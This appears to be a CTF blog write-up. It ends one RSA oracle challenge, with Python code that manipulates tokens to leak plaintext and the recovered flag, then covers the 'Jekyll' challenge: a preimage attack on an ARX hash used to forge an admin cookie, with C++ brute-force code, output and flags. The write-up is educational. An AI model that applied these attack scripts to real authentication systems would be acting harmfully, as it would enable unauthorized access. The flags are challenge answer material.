N = 105949368219170569676644297776119989261727047689020303679150543602433973822995622211997257369689976874802809991413640314155194724653004419692410129247990491389423643529600372760167148548937151460112884769720131611650468716029162594828863368194056749527587059285082313899147126415401813360799509875983663185381
E = 3

for d in xrange(3, 50, 2):
    c = token
    c = (c * invmod(pow(d, E, N), N)) % N
    c = (c * pow(d + 2, E, N)) % N
    res = oracle(c)
    print d, ":", res
    if "decoded" in res:
        leaked = json.loads(res)["decoded"].decode("hex")
        t = len(leaked) * 8 + 8
        mod = 2**t

        s = s2n(leaked)
        s = (s * d * invmod(d + 2, mod)) % mod
        print `n2s(s)`

Let’s run it:

$ py wu.py 
3 : {"status": "invalid", "message": "Could not decrypt token"}
5 : {"status": "invalid", "message": "Could not decrypt token"}
7 : {"status": "invalid", "message": "Could not decrypt token"}
9 : {"status": "invalid", "decoded": "be004da5a80f8a36ce85ab9be
442326d2d7d5ba6b663e0feca1da42752433759e3e083729688de33c02a3e38
a59c0550895f86fe8938f9a59ae121c2431afb03b87bf86ccd4f56505438edc
1faf9f86cc72a4313a54ffad8f15f94177580dc42c1c1c227", "message":
"token is invalid"}
't\xf8\x8b\xe2pC\xaf\x9f\xa14\x9b\xe9\x7f\x8c6)B\r\xf23\xb6\xf2
Q\xb8\x16HF\xcc ,\x08s\x1b\x00CTF{***What*happens*to*grapes*whe
n*you*step*on*them***They*wine***}'

Nice! We got the full flag: CTF{***What*happens*to*grapes*when*you*step*on*them***They*wine***}

PS: Note that the described attack does not use the fact that the exponent 3 is small. So maybe the authors expected another attack. Please let me know if you are aware of a suitable attack here which exploits the small exponent.

Google CTF – Jekyll (Crypto)

hellman — Sun, 01 May 2016 19:45:17 +0000

Can you access the admin page? You can look at the crypto here.

source.py

Summary: finding a preimage for a simple 64-bit ARX-based hash.

Here’s the code of the web server:

def jekyll32(data, seed):
    def mix(a, b, c):
        a &= 0xFFFFFFFF; b &= 0xFFFFFFFF; c &= 0xFFFFFFFF;

        a -= b+c; a &= 0xFFFFFFFF; a ^= c >> 13
        b -= c+a; b &= 0xFFFFFFFF; b ^=(a <<  8)&0xFFFFFFFF
        c -= a+b; c &= 0xFFFFFFFF; c ^= b >> 13
        a -= b+c; a &= 0xFFFFFFFF; a ^= c >> 12
        b -= c+a; b &= 0xFFFFFFFF; b ^=(a << 16)&0xFFFFFFFF
        c -= a+b; c &= 0xFFFFFFFF; c ^= b >>  5
        a -= b+c; a &= 0xFFFFFFFF; a ^= c >>  3
        b -= c+a; b &= 0xFFFFFFFF; b ^=(a << 10)&0xFFFFFFFF
        c -= a+b; c &= 0xFFFFFFFF; c ^= b >> 15

        return a, b, c

    a = 0x9e3779b9
    b = a
    c = seed
    length = len(data)

    keylen = length
    while keylen >= 12:
        values = struct.unpack('<3I', data[:12])
        a += values[0]
        b += values[1]
        c += values[2]

        a, b, c = mix(a, b, c)
        keylen -= 12
        data = data[12:]

    c += length

    data += '\x00' * (12-len(data))
    values = struct.unpack('<3I', data)

    a += values[0]
    b += values[1]
    c += values[2]

    a, b, c = mix(a, b, c)

    return c

def jekyll(data):
    return jekyll32(data, 0x60061e) | (jekyll32(data, 0x900913) << 32)

...
cookie = self.request.cookies.get('admin')
if cookie is not None and jekyll(base64.b64decode(cookie)) == 0x203b1b70cb122e29:
    self.response.write('Hello admin!\n'+FLAG)
else:
    self.response.write('Who are you?')
...

So we need to find preimage of 203b1b70cb122e29 with hash described by the jekyll function, which simply concatenates two calls to jekyll32 with different seeds.

The core of jekyll32 is the mix function. It takes three 32-bit words and transforms them using ARX operations. Note that mix is easily invertible if we have all three values. However, the jekyll32 function returns only the third value.

The message is processed in blocks of 12 bytes and is padded with at least one zero. Let's see what we can do with one block. The hash then works like this:

$$
\begin{split}
jekyll32 & (m_1 || m_2 || m_3, seed) = \\
& mix( (\text{9e3779b9},\text{9e3779b9},seed + length) + (m_1, m_2, m_3) ).
\end{split}
$$

We can set some random values to the outputs $a, b$, and invert the $mix$ function. Then, we subtract the initial constants and deduce a message which results in the given triple $a, b, c$, where $c$ is equal to the 32-bit half of the hash. Now we can change the seed and compute the hash and check if it matches the other half. That is, we need $2^{33}$ evaluations of the $mix$ function.

However, there is a problem: at least one zero byte is appended, so with one block we can control only 11 bytes. That is, when we invert the $mix$ function, we don't control one byte of the third word (the padding byte, which is always zero), so the value we get for it must happen to be consistent with $seed + length$. Thus, we have to try $2^8$ times more. It is still doable, but takes quite a lot of time.

Let's instead consider messages with two blocks. We won't care about the second block, we will use only the fact that the first block is fully controlled by us. So we can actually let the second block be the zero pad. And the general scheme stays the same.

To sum up the attack:

let $h_1, h_2$ be 32-bit halves of the target hash;
choose random $a, b$;
compute $t = mix^{-1}(a, b, h_1)$;
subtract $length = 12$;
compute $s = mix^{-1}(t - 12)$;
deduce $m = s - (\text{9e3779b9},\text{9e3779b9},seed_1)$;
check if $jekyll32(m, seed_2) == h_2$.

We will have to repeat this around $2^{32}$ times, each time we do $4$ evaluations of $mix$ or $mix^{-1}$.
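The inversion part of the attack (everything except the final $2^{32}$ search) can be sketched in Python 3. This is my own port of the hash for illustration, with `unmix` and `half_preimage` as hypothetical helper names; it only shows that any choice of $a, b$ gives a 12-byte message matching one 32-bit half.

```python
import struct

MASK = 0xFFFFFFFF
INIT = 0x9e3779b9
SHIFTS = [(13, 8, 13), (12, 16, 5), (3, 10, 15)]   # three rounds of mix

def mix(a, b, c):
    a &= MASK; b &= MASK; c &= MASK
    for s1, s2, s3 in SHIFTS:
        a = ((a - b - c) & MASK) ^ (c >> s1)
        b = ((b - c - a) & MASK) ^ ((a << s2) & MASK)
        c = ((c - a - b) & MASK) ^ (b >> s3)
    return a, b, c

def unmix(a, b, c):
    # Undo the steps of mix in reverse order.
    for s1, s2, s3 in reversed(SHIFTS):
        c = ((c ^ (b >> s3)) + a + b) & MASK
        b = ((b ^ ((a << s2) & MASK)) + c + a) & MASK
        a = ((a ^ (c >> s1)) + b + c) & MASK
    return a, b, c

def jekyll32(data, seed):
    a, b, c = INIT, INIT, seed
    length = len(data)
    while len(data) >= 12:
        v = struct.unpack('<3I', data[:12])
        a, b, c = mix(a + v[0], b + v[1], c + v[2])
        data = data[12:]
    c += length
    v = struct.unpack('<3I', data + b'\x00' * (12 - len(data)))
    return mix(a + v[0], b + v[1], c + v[2])[2]

def half_preimage(target, seed, a, b):
    """12-byte message m with jekyll32(m, seed) == target."""
    ta, tb, tc = unmix(a, b, target)               # before the final mix
    sa, sb, sc = unmix(ta, tb, (tc - 12) & MASK)   # before the first mix
    words = ((sa - INIT) & MASK, (sb - INIT) & MASK, (sc - seed) & MASK)
    return struct.pack('<3I', *words)

msg = half_preimage(0xcb122e29, 0x60061e, 0, 0x31337)
print(msg.hex(), hex(jekyll32(msg, 0x60061e)))
```

The full attack repeats this for different $a$ until the hash of the same message under the second seed equals the other half, which is what the C++ loop below does much faster.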

Here's C++ code:

#include <cstdint>
#include <cstdio>
// g++ brute.cpp -O3 -std=c++11 -o brute && time ./brute

struct State {
    uint32_t a, b, c;
    void mix() {
        a -= b+c;
        a ^= c >> 13;
        b -= c+a;
        b ^= a << 8;
        c -= a+b;
        c ^= b >> 13;
        a -= b+c;
        a ^= c >> 12;
        b -= c+a;
        b ^= a << 16;
        c -= a+b;
        c ^= b >> 5;
        a -= b+c;
        a ^= c >> 3;
        b -= c+a;
        b ^= a << 10;
        c -= a+b;
        c ^= b >> 15;
    }
    void unmix() {
        c ^= b >> 15;
        c += a+b;
        b ^= a << 10;
        b += c+a;
        a ^= c >> 3;
        a += b+c;
        c ^= b >> 5;
        c += a+b;
        b ^= a << 16;
        b += c+a;
        a ^= c >> 12;
        a += b+c;
        c ^= b >> 13;
        c += a+b;
        b ^= a << 8;
        b += c+a;
        a ^= c >> 13;
        a += b+c;
    }
};

uint32_t STARTCONST = 0x9e3779b9;
uint32_t LENGTH = 12;
uint32_t SEED1 = 0x60061e;
uint32_t SEED2 = 0x900913;
uint32_t HASH1 = 0xcb122e29;
uint32_t HASH2 = 0x203b1b70;

int main() {
    for(uint64_t a = 0; a < 1ll << 32; a++) {
        if ((a & 0xffffff) == 0) {
            printf("%08x\n", (uint32_t)a);
        }
        // explicit cast: brace initialization does not allow narrowing
        State s = {(uint32_t)a, 0x31337, HASH1};
        s.unmix();
        s.c -= LENGTH;
        // subtract message, but we set it to zeroes
        // so do nothing
        s.unmix();

        uint32_t p[3];
        p[0] = s.a - STARTCONST;
        p[1] = s.b - STARTCONST;
        p[2] = s.c - SEED1;
        s.a = p[0] + STARTCONST;
        s.b = p[1] + STARTCONST;
        s.c = p[2] + SEED2;
        s.mix();
        s.c += LENGTH;
        s.mix();

        if (s.c == HASH2) {
            printf("GOOD: %08x %08x %08x\n", p[0], p[1], p[2]);
            printf("PLAIN: ");
            // print all 12 message bytes, not the pointer value
            for(int i = 0; i < 12; i++)
                printf("%02x", ((unsigned char*)p)[i]);
            printf("\n");
        }
    }
    return 0;
}

GOOD: 5cc80e2e e7fee109 d6d486f1
PLAIN: 2e0ec85c09e1fee7f186d4d6
2m2.185s

The flag: CTF{diD_y0u_ruN_iT_0N_Y0uR_l4PtoP?}